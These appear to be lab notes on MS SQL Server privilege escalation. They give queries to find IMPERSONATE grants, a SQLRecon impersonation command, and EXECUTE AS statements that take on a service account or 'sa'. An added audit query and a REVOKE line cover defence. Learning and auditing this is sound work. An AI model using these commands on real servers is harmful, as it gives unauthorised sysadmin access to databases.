MS SQL Impersonation

Discover accounts to impersonate

SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE'

101 | SERVER_PRINCIPAL | 267 | 0 | 268 | 267 | IM | IMPERSONATE | G | GRANT |

The grantee_principal_id, 268, is allowed to impersonate the grantor_principal_id, 267.

Look up IDs

SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals

Here, we see that 267 is DEV\mssql_svc and 268 is DEV\Domain Users
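The two lookups above can be combined into a single audit query that resolves every IMPERSONATE grant to login names and flags grants whose target is a sysadmin. This is an added example, not part of the original notes; it takes major_id as the login that can be impersonated (267 in the row above), and the column aliases are chosen here for readability.

```sql
-- Added audit example: list who may impersonate whom, by name.
SELECT
    grantee.name       AS grantee_login,       -- principal holding IMPERSONATE
    grantee.type_desc  AS grantee_type,        -- e.g. WINDOWS_GROUP, SQL_LOGIN
    target.name        AS impersonable_login,  -- login that can be impersonated
    target.is_disabled AS target_disabled,
    perm.state_desc    AS grant_state,         -- GRANT or GRANT_WITH_GRANT_OPTION
    grantor.name       AS granted_by,
    -- 1 = target is sysadmin, 0 = not, NULL = caller cannot evaluate membership
    IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions AS perm
JOIN sys.server_principals  AS grantee
     ON grantee.principal_id = perm.grantee_principal_id
JOIN sys.server_principals  AS target
     ON target.principal_id  = perm.major_id
JOIN sys.server_principals  AS grantor
     ON grantor.principal_id = perm.grantor_principal_id
WHERE perm.permission_name = 'IMPERSONATE'
  AND perm.class_desc      = 'SERVER_PRINCIPAL'
  AND perm.state IN ('G', 'W')                 -- skip DENY rows
ORDER BY target_is_sysadmin DESC, impersonable_login;

-- Remediation for the grant shown in the sample row above
-- (run as a sysadmin after confirming nothing depends on it):
-- REVOKE IMPERSONATE ON LOGIN::[DEV\mssql_svc] FROM [DEV\Domain Users];
```

Rows where grantee_type is a broad group such as DEV\Domain Users and target_is_sysadmin is 1 are the ones to review first.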

Easier way

SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate

Impersonate

EXECUTE AS login = 'DEV\mssql_svc'; SELECT SYSTEM_USER
EXECUTE AS login = 'DEV\mssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin')
EXECUTE AS login = 'sa'

SQLRecon modules can also be run in "impersonation mode".
